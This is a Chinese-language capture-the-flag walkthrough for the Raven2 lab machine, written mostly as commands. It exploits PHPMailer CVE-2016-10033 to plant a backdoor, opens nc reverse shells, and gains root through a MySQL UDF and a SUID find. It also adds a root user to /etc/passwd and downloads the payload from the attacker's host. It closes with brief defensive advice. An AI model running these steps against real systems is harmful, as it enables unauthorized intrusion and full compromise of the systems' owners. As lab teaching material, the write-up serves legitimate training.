Raven2 渗透测试实战教学文档<\/h1>

1. 环境准备<\/h2>

攻击机<\/strong>: Kali Linux<\/li>
目标机<\/strong>: IP地址 192.168.111.132 (VMware虚拟机)<\/li>

工具准备<\/strong>: nmap, dirb, searchsploit, nc (netcat), gcc, mysql客户端<\/li> <\/ul>
2. 信息收集阶段<\/h2>
2.1 网络扫描<\/h3>
nmap -sP 192.168.111.0\/24 # 发现目标IP<\/span> <\/span><\/span>nmap 192.168.111.132 -p- # 全端口扫描<\/span> <\/span><\/span><\/code><\/pre>2.2 Web目录枚举<\/h3> dirb http:\/\/192.168.111.132 <\/span><\/span><\/code><\/pre>发现关键路径:<\/p> http:\/\/192.168.111.132\/vendor\/<\/code> - 包含flag文件<\/li> http:\/\/192.168.111.132\/contact.php<\/code> - PHPMailer漏洞点<\/li> <\/ul> 3. Web渗透<\/h2> 3.1 获取flag1<\/h3> 访问 http:\/\/192.168.111.132\/vendor\/path<\/code><\/li> 获得flag1: flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}<\/code><\/li> <\/ol> 3.2 PHPMailer漏洞利用(CVE-2016-10033)<\/h3> 发现PHPMailer版本为5.2.16<\/li> 搜索漏洞利用代码: searchsploit 40974<\/span> <\/span><\/span>cp \/usr\/share\/exploitdb\/exploits\/php\/webapps\/40974.py \/root\/Desktop\/ <\/span><\/span><\/code><\/pre><\/li> 修改exp文件关键参数: 第41行: 目标URL http:\/\/192.168.111.132\/contact.php<\/code><\/li> 第42行: 后门名称 \/dayu.php<\/code><\/li> 第44行: 监听IP和端口 192.168.111.128 6666<\/code><\/li> 第47行: shell写入路径 \/var\/www\/html\/dayu.php<\/code><\/li> <\/ul> <\/li> 执行exp: python3 40974.py <\/span><\/span><\/code><\/pre><\/li> 访问触发页面: http:\/\/192.168.111.132\/contact.php <\/span><\/span><\/code><\/pre><\/li> 开启监听并访问后门: nc -vlp 6666<\/span> <\/span><\/span>http:\/\/192.168.111.132\/dayu.php <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3.3 获取flag2和flag3<\/h3> 提升shell交互性: python -c 'import pty; pty.spawn("\/bin\/bash")'<\/span> <\/span><\/span><\/code><\/pre><\/li> 查找flag文件: find \/ -name flag* <\/span><\/span><\/code><\/pre><\/li> 发现flag路径: \/var\/www\/flag2.txt<\/code><\/li> \/var\/www\/html\/wordpress\/wp-content\/uploads\/2018\/11\/flag3.png<\/code><\/li> <\/ul> <\/li> 获取flag2: cat \/var\/www\/flag2.txt <\/span><\/span><\/code><\/pre>输出: flag2{6a8ed560f0b5358ecf844108048eb337}<\/code><\/li> 获取flag3: 浏览器访问 http:\/\/192.168.111.132\/wordpress\/wp-content\/uploads\/2018\/11\/flag3.png<\/code><\/li> <\/ol> 4. WordPress数据库信息收集<\/h2> 查找WordPress配置文件: grep "password"<\/span> -rn wp-config.php <\/span><\/span><\/code><\/pre><\/li> 获取数据库凭据: \/** MySQL database username *\/<\/span> <\/span><\/span>define('DB_USER'<\/span>, 'root'<\/span>); <\/span><\/span>\/** MySQL database password *\/<\/span> <\/span><\/span>define('DB_PASSWORD'<\/span>, 'R@v3nSecurity'<\/span>); <\/span><\/span><\/code><\/pre><\/li> <\/ol> 5. MySQL提权<\/h2> 5.1 环境检查<\/h3> 登录MySQL: mysql -u root -pR@v3nSecurity <\/span><\/span><\/code><\/pre><\/li> 检查MySQL版本和权限: select<\/span> version<\/span>(); <\/span><\/span>select<\/span> user<\/span>,host<\/span> from<\/span> user<\/span>; <\/span><\/span><\/code><\/pre><\/li> 检查安全设置: show<\/span> global<\/span> variables like<\/span> 'secure%'<\/span>; <\/span><\/span>show<\/span> variables like<\/span> '%plugin%'<\/span>; <\/span><\/span><\/code><\/pre><\/li> <\/ol> 5.2 UDF提权准备<\/h3> 搜索并编译UDF提权代码: searchsploit 1518<\/span> <\/span><\/span>cp \/usr\/share\/exploitdb\/exploits\/linux\/local\/1518.c \/root\/Desktop\/ <\/span><\/span>gcc -g -c 1518.c <\/span><\/span>gcc -g -shared -o dayu.so 1518.o -lc <\/span><\/span><\/code><\/pre><\/li> 传输so文件到目标: # 攻击机开启HTTP服务<\/span> <\/span><\/span>python3 -m http.server 8081<\/span> <\/span><\/span># 目标机下载<\/span> <\/span><\/span>wget 192.168.111.128:8081\/dayu.so -O \/tmp\/dayu.so <\/span><\/span><\/code><\/pre><\/li> <\/ol> 5.3 UDF提权执行<\/h3> MySQL中执行: use mysql; <\/span><\/span>create<\/span> table<\/span> dayu(line blob); <\/span><\/span>insert<\/span> into<\/span> dayu values<\/span>(load_file('\/tmp\/dayu.so'<\/span>)); <\/span><\/span>select<\/span> *<\/span> from<\/span> dayu into<\/span> dumpfile '\/usr\/lib\/mysql\/plugin\/dayu.so'<\/span>; <\/span><\/span>create<\/span> function<\/span> do_system returns<\/span> integer soname 'dayu.so'<\/span>; <\/span><\/span>select<\/span> *<\/span> from<\/span> mysql.func; #<\/span> 验证函数创建<\/span> <\/span><\/span><\/code><\/pre><\/li> 赋予find命令SUID权限: select<\/span> do_system('chmod u+s \/usr\/bin\/find'<\/span>); <\/span><\/span><\/code><\/pre><\/li> 利用find提权: touch dayu <\/span><\/span>find dayu -exec "\/bin\/sh"<\/span> \;<\/span> <\/span><\/span><\/code><\/pre><\/li> 获取root权限后查找flag4: find \/ -name flag* <\/span><\/span>cat \/path\/to\/flag4 <\/span><\/span><\/code><\/pre>输出: flag4{df2bc5e951d91581467bb9a2a8ff4425}<\/code><\/li> <\/ol> 6. 拓展技术<\/h2> 6.1 反弹shell替代方案<\/h3> select<\/span> do_system('nc -nv 192.168.111.128 6677 -e \/bin\/bash'<\/span>); <\/span><\/span><\/code><\/pre>6.2 稳定shell会话<\/h3> python -c 'import pty; pty.spawn("\/bin\/bash")'<\/span> <\/span><\/span># 按Ctrl+Z<\/span> <\/span><\/span>stty raw -echo <\/span><\/span>fg <\/span><\/span><\/code><\/pre>6.3 添加root用户<\/h3> openssl passwd dayu # 生成密码hash<\/span> <\/span><\/span>select<\/span> do_system(<\/span>'echo "dayu:xFzxgAbLwwOOA:0:0:root:\/root:\/bin\/bash" >> \/etc\/passwd'<\/span>)<\/span>; <\/span><\/span>su dayu <\/span><\/span><\/code><\/pre>7. 关键知识点总结<\/h2> 信息收集<\/strong>: nmap扫描、目录枚举<\/li> 漏洞利用<\/strong>: PHPMailer CVE-2016-10033<\/li> 权限提升<\/strong>: MySQL UDF提权技术<\/li> 后渗透<\/strong>: 稳定shell、添加用户等技术<\/li> 防御建议<\/strong>: 及时更新PHPMailer版本<\/li> 限制MySQL文件操作权限(secure_file_priv)<\/li> 避免MySQL以root权限运行<\/li> 定期检查系统SUID权限文件<\/li> <\/ul> <\/li> <\/ol>